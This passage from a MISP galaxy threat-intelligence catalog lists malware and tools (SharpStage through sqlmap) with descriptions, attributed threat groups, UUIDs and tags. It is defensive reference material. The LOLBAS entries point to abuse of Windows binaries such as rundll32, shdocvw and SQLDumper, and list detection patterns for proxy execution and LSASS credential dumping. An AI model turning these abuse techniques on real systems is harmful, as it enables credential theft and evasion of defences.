in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5004 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SharpStage
SharpStage is a .NET malware with backdoor capabilities.[Cybereason Molerats Dec 2020][BleepingComputer Molerats Dec 2020]
Internal MISP references
UUID 564643fd-7113-490e-9f6a-f0cc3f0e1a4c
which can be used as unique global reference for SharpStage
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0546 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SHARPSTATS
SHARPSTATS is a .NET backdoor used by MuddyWater since at least 2019.[TrendMicro POWERSTATS V3 June 2019]
Internal MISP references
UUID f655306f-f7b4-4eec-9bd6-ac75142fcb43
which can be used as unique global reference for SHARPSTATS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0450 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Shdocvw
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Shell Doc Object and Control Library.
Author: LOLBAS Team
Paths: * c:\windows\system32\shdocvw.dll * c:\windows\syswow64\shdocvw.dll
Resources: * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ * https://twitter.com/bohops/status/997690405092290561 * https://windows10dll.nirsoft.net/shdocvw_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Shdocvw.dll - LOLBAS Project]
Internal MISP references
UUID 67323b8a-e805-4503-8a40-d47f229453a0
which can be used as unique global reference for Shdocvw
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5196 |
source | Tidal Cyber |
tags | ['2c0f0b44-9b09-49a0-8dc5-d9fdcc515825', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Shell32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Shell Common Dll
Author: LOLBAS Team
Paths: * c:\windows\system32\shell32.dll * c:\windows\syswow64\shell32.dll
Resources: * https://twitter.com/Hexacorn/status/885258886428725250 * https://twitter.com/pabraeken/status/991768766898941953 * https://twitter.com/mattifestation/status/776574940128485376 * https://twitter.com/KyleHanslovan/status/905189665120149506 * https://windows10dll.nirsoft.net/shell32_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml * Splunk: rundll32_control_rundll_hunt.yml[Shell32.dll - LOLBAS Project]
Internal MISP references
UUID edf31b62-e9db-43c8-b9ef-55afd6b0404c
which can be used as unique global reference for Shell32
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5197 |
source | Tidal Cyber |
tags | ['e0b9882e-b9bb-4c16-b3d9-9268866eded0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Shimgvw
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Photo Gallery Viewer
Author: Eral4m
Paths: * c:\windows\system32\shimgvw.dll * c:\windows\syswow64\shimgvw.dll
Resources: * https://twitter.com/eral4m/status/1479080793003671557
Detection: * IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line[Shimgvw.dll - LOLBAS Project]
Internal MISP references
UUID 691b3a37-af46-47d2-a027-d93d901e0dac
which can be used as unique global reference for Shimgvw
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5198 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ShimRat
ShimRat has been used by the suspected China-based adversary Mofang in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "ShimRat" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. [FOX-IT May 2016 Mofang]
Internal MISP references
UUID a3287231-351f-472f-96cc-24db2e3829c7
which can be used as unique global reference for ShimRat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0444 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ShimRatReporter
ShimRatReporter is a tool used by suspected Chinese adversary Mofang to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as ShimRat) as well as set up faux infrastructure which mimics the adversary's targets. ShimRatReporter has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.[FOX-IT May 2016 Mofang]
Internal MISP references
UUID 77d9c948-93e3-4e12-9764-4da7570d9275
which can be used as unique global reference for ShimRatReporter
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0445 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SHIPSHAPE
SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]
Internal MISP references
UUID 3db0b464-ec5d-4cdd-86c2-62eac9c8acd6
which can be used as unique global reference for SHIPSHAPE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0028 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SHOTPUT
SHOTPUT is a custom backdoor used by APT3. [FireEye Clandestine Wolf]
Internal MISP references
UUID 49351818-579e-4298-9137-03b3dc699e22
which can be used as unique global reference for SHOTPUT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0063 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SHUTTERSPEED
SHUTTERSPEED is a backdoor used by APT37. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 5b2d82a6-ed96-485d-bca9-2320590de890
which can be used as unique global reference for SHUTTERSPEED
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0217 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sibot
Sibot is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three Sibot variants in early 2021 during its investigation of APT29 and the SolarWinds Compromise.[MSTIC NOBELIUM Mar 2021]
Internal MISP references
UUID ea0a1282-f2bf-4ae0-a19c-d7e379c2309b
which can be used as unique global reference for Sibot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0589 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SideTwist
SideTwist is a C-based backdoor that has been used by OilRig since at least 2021.[Check Point APT34 April 2021]
Internal MISP references
UUID 61227a76-d315-4339-803a-e024f96e089e
which can be used as unique global reference for SideTwist
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0610 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SILENTTRINITY
SILENTTRINITY is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. SILENTTRINITY was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.[GitHub SILENTTRINITY March 2022][Security Affairs SILENTTRINITY July 2019]
Internal MISP references
UUID 4765999f-c35e-4a9f-8284-9f10a17e6c34
which can be used as unique global reference for SILENTTRINITY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0692 |
source | MITRE |
type | ['tool'] |
Siloscape
Siloscape is malware that targets Kubernetes clusters through Windows containers. Siloscape was first observed in March 2021.[Unit 42 Siloscape Jun 2021]
Internal MISP references
UUID 8ea75674-cc08-40cf-824c-40eb5cd6097e
which can be used as unique global reference for Siloscape
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Containers', 'Windows'] |
software_attack_id | S0623 |
source | MITRE |
tags | ['4fa6f8e1-b0d5-4169-8038-33e355c08bde'] |
type | ['malware'] |
Skeleton Key
Skeleton Key is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. [Dell Skeleton] Functionality similar to Skeleton Key is included as a module in Mimikatz.
Internal MISP references
UUID 206453a4-a298-4cab-9fdf-f136a4e0c761
which can be used as unique global reference for Skeleton Key
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0007 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Skidmap
Skidmap is a kernel-mode rootkit used for cryptocurrency mining.[Trend Micro Skidmap]
Internal MISP references
UUID cc91d3d4-bbf5-4a9c-b43a-2ba034db4858
which can be used as unique global reference for Skidmap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0468 |
source | MITRE |
type | ['malware'] |
SLIGHTPULSE
SLIGHTPULSE is a web shell that was used by APT5 as early as 2020 including against Pulse Secure VPNs at US Defense Industrial Base (DIB) entities.[Mandiant Pulse Secure Zero-Day April 2021]
Internal MISP references
UUID c8fed4fc-5721-5db2-b107-b2a9b677244e
which can be used as unique global reference for SLIGHTPULSE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1110 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sliver
Sliver is an open source, cross-platform, red team command and control framework written in Golang.[Bishop Fox Sliver Framework August 2019]
Internal MISP references
UUID bbd16b7b-7e35-4a11-86ff-9b19e17bdab3
which can be used as unique global reference for Sliver
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0633 |
source | MITRE |
tags | ['e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SLOTHFULMEDIA
SLOTHFULMEDIA is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.[CISA MAR SLOTHFULMEDIA October 2020][Costin Raiu IAmTheKing October 2020] It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.[USCYBERCOM SLOTHFULMEDIA October 2020][Kaspersky IAmTheKing October 2020]
In October 2020, Kaspersky Labs assessed SLOTHFULMEDIA is part of an activity cluster it refers to as "IAmTheKing".[Kaspersky IAmTheKing October 2020] ESET also noted code similarity between SLOTHFULMEDIA and droppers used by a group it refers to as "PowerPool".[ESET PowerPool Code October 2020]
Internal MISP references
UUID 563c6534-497e-4d65-828c-420d5bb2041a
which can be used as unique global reference for SLOTHFULMEDIA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0533 |
source | MITRE |
type | ['malware'] |
SLOWDRIFT
SLOWDRIFT is a backdoor used by APT37 against academic and strategic victims in South Korea. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 7c047a54-93cf-4dfc-ab20-d905791aebb2
which can be used as unique global reference for SLOWDRIFT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0218 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SLOWPULSE
SLOWPULSE is a malware that was used by APT5 as early as 2020 including against U.S. Defense Industrial Base (DIB) companies. SLOWPULSE has several variants and can modify legitimate Pulse Secure VPN files in order to log credentials and bypass single and two-factor authentication flows.[Mandiant Pulse Secure Zero-Day April 2021]
Internal MISP references
UUID 37e264a6-5ad3-5a79-bf2c-db725622206e
which can be used as unique global reference for SLOWPULSE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1104 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Small Sieve
Small Sieve is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by MuddyWater since at least January 2022.[DHS CISA AA22-055A MuddyWater February 2022][NCSC GCHQ Small Sieve Jan 2022]
Security researchers have also noted Small Sieve's use by UNC3313, which may be associated with MuddyWater.[Mandiant UNC3313 Feb 2022]
Internal MISP references
UUID c58028b9-2e79-4bc9-9b04-d24ea4dd4948
which can be used as unique global reference for Small Sieve
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1035 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SMOKEDHAM
SMOKEDHAM is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.[FireEye Shining A Light on DARKSIDE May 2021][FireEye SMOKEDHAM June 2021]
Internal MISP references
UUID 9ae4154d-ee48-4aeb-b76f-6e40dbe18ff3
which can be used as unique global reference for SMOKEDHAM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0649 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Smoke Loader
Smoke Loader is a malicious bot application that can be used to load other malware. Smoke Loader has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. [Malwarebytes SmokeLoader 2016] [Microsoft Dofoil 2018]
Internal MISP references
UUID 2244253f-a4ad-4ea9-a4bf-fa2f4d895853
which can be used as unique global reference for Smoke Loader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0226 |
source | MITRE |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Snip3
Snip3 is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including AsyncRAT, Revenge RAT, Agent Tesla, and NETWIRE.[Morphisec Snip3 May 2021][Telefonica Snip3 December 2021]
Internal MISP references
UUID f587dc27-92be-5894-a4a8-d6c8bbcf8ede
which can be used as unique global reference for Snip3
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1086 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SNUGRIDE
SNUGRIDE is a backdoor that has been used by menuPass as first stage malware. [FireEye APT10 April 2017]
Internal MISP references
UUID d6c24f7c-fe79-4094-8f3c-68c4446ae4c7
which can be used as unique global reference for SNUGRIDE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0159 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SocGholish
SocGholish is a JavaScript-based loader malware that has been used since at least 2017. It has been observed in use against multiple sectors globally for initial access, primarily through drive-by-downloads masquerading as software updates. SocGholish is operated by Mustard Tempest and its access has been sold to groups including Indrik Spider for downloading secondary RAT and ransomware payloads.[SentinelOne SocGholish Infrastructure November 2022][SocGholish-update][Red Canary SocGholish March 2024][Secureworks Gold Prelude Profile]
Internal MISP references
UUID ab84f259-9b9a-51d8-a68a-2bcd7512d760
which can be used as unique global reference for SocGholish
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1124 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Socksbot
Socksbot is a backdoor that abuses Socket Secure (SOCKS) proxies. [TrendMicro Patchwork Dec 2017]
Internal MISP references
UUID c1906bb6-0b5b-4916-8b29-37f7e272f6b3
which can be used as unique global reference for Socksbot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0273 |
source | MITRE |
type | ['malware'] |
SodaMaster
SodaMaster is a fileless malware used by menuPass to download and execute payloads since at least 2020.[Securelist APT10 March 2021]
Internal MISP references
UUID 6ecd970c-427b-4421-a831-69f46047d22a
which can be used as unique global reference for SodaMaster
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0627 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SoftEther VPN
SoftEther VPN is an open-source software project that, according to its GitHub page, is "cross-platform multi-protocol VPN software".[GitHub SoftEtherVPN SoftEtherVPN_Stable] In August 2023, Microsoft researchers reported how Flax Typhoon, a nation-state-sponsored espionage group based in China, used SoftEther VPN as a key element of its command and control infrastructure during attacks on targets in Taiwan and elsewhere.[Microsoft Flax Typhoon August 24 2023]
Internal MISP references
UUID 46a9ee9c-6c4a-4db9-9385-46d2617d8050
which can be used as unique global reference for SoftEther VPN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S5305 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SoftPerfect Network Scanner
SoftPerfect Network Scanner is a tool used to perform network scans for systems management purposes.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 4272447f-8803-4947-b66f-051eecdd3385
which can be used as unique global reference for SoftPerfect Network Scanner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5008 |
source | Tidal Cyber |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SombRAT
SombRAT is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including FIVEHANDS ransomware.[BlackBerry CostaRicto November 2020][FireEye FiveHands April 2021][CISA AR21-126A FIVEHANDS May 2021]
Internal MISP references
UUID 0ec24158-d5d7-4d2e-b5a5-bc862328a317
which can be used as unique global reference for SombRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0615 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
SoreFang
SoreFang is first stage downloader used by APT29 for exfiltration and to load other malware.[NCSC APT29 July 2020][CISA SoreFang July 2016]
Internal MISP references
UUID 3e959586-14ff-407b-a0d0-4e9580546f3f
which can be used as unique global reference for SoreFang
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0516 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SOUNDBITE
SOUNDBITE is a signature backdoor used by APT32. [FireEye APT32 May 2017]
Internal MISP references
UUID 069538a5-3cb8-4eb4-9fbb-83867bb4d826
which can be used as unique global reference for SOUNDBITE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0157 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SPACESHIP
SPACESHIP is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]
Internal MISP references
UUID 0f8d0a73-9cd3-475a-b31b-d457278c921a
which can be used as unique global reference for SPACESHIP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0035 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Spark
Spark is a Windows backdoor and has been in use since as early as 2017.[Unit42 Molerat Mar 2020]
Internal MISP references
UUID 93f8c180-6794-4e9c-b716-6b31f42eb72d
which can be used as unique global reference for Spark
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0543 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SpeakUp
SpeakUp is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. [CheckPoint SpeakUp Feb 2019]
Internal MISP references
UUID b9b67878-4eb1-4a0b-9b36-a798881ed566
which can be used as unique global reference for SpeakUp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux'] |
software_attack_id | S0374 |
source | MITRE |
type | ['malware'] |
SpectralBlur
SpectralBlur is a malware targeting macOS systems that has backdoor functionality. Researchers have linked the malware to "TA444/Bluenoroff" actors.[Objective_See 1 4 2024]
Internal MISP references
UUID 89e2bdbf-4839-4b35-bd19-316a953d7acf
which can be used as unique global reference for SpectralBlur
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS'] |
software_attack_id | S5311 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sphynx
Sphynx is a variant of BlackCat ransomware (AKA ALPHV or Noberus) first observed in early 2023, which features multiple defense evasion-focused enhancements over the BlackCat strain. For example, Sphynx uses a more complex set of execution parameters, its configuration details are formatted as raw structures instead of JSON, and observed samples contain large amounts of “junk” code and encrypted strings.[X-Force BlackCat May 30 2023] Sphynx also features built-in versions of other tools to support specific functions, including the open-source Impacket tool for lateral movement and Remcom, a hacking tool that facilitates remote code execution.[Microsoft Threat Intelligence Tweet August 17 2023]
Internal MISP references
UUID cdbebd0a-3036-4a24-b1d5-a3f0ca9c758e
which can be used as unique global reference for Sphynx
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5055 |
source | Tidal Cyber |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SpicyOmelette
SpicyOmelette is a JavaScript based remote access tool that has been used by Cobalt Group since at least 2018.[Secureworks GOLD KINGSWOOD September 2018]
Internal MISP references
UUID 2be9e22d-0af8-46f5-b30e-b3712ccf716d
which can be used as unique global reference for SpicyOmelette
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0646 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Splashtop
Splashtop is a tool used to enable remote connections to network devices for support and administration.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID ecf8b878-19e5-425b-bc34-d5ed6e999fea
which can be used as unique global reference for Splashtop
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5009 |
source | Tidal Cyber |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '9bc47297-864d-4f39-be37-ad9379102853', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SplitLoader
SplitLoader is an intermediate-stage malware used by the North Korean threat actor Moonstone Sleet mainly for payload execution purposes. It is also capable of performing system reconnaissance.[Microsoft Security Blog 5 28 2024]
Internal MISP references
UUID 9a20c7f3-4e17-4a79-994a-c577afef5c72
which can be used as unique global reference for SplitLoader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5322 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
spwebmember
spwebmember is a Microsoft SharePoint enumeration and data dumping tool written in .NET. [NCC Group APT15 Alive and Strong]
Internal MISP references
UUID 0fdabff3-d996-493c-af67-f3ac02e4b00b
which can be used as unique global reference for spwebmember
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0227 |
source | MITRE |
tags | ['cd1b5d44-226e-4405-8985-800492cf2865', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Sqldumper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging utility included with Microsoft SQL.
Author: Oddvar Moe
Paths: * C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe * C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
Resources: * https://twitter.com/countuponsec/status/910969424215232518 * https://twitter.com/countuponsec/status/910977826853068800 * https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
Detection: * Sigma: proc_creation_win_lolbin_susp_sqldumper_activity.yml * Elastic: credential_access_lsass_memdump_file_created.toml * Elastic: credential_access_cmdline_dump_tool.toml[Sqldumper.exe - LOLBAS Project]
Internal MISP references
UUID 146bd853-166b-4859-b4d7-b70f51bfd8e9
which can be used as unique global reference for Sqldumper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5235 |
source | Tidal Cyber |
tags | ['e992169d-832d-44e9-8218-0f4ab0ff72b4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
sqlmap
sqlmap is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. [sqlmap Introduction]
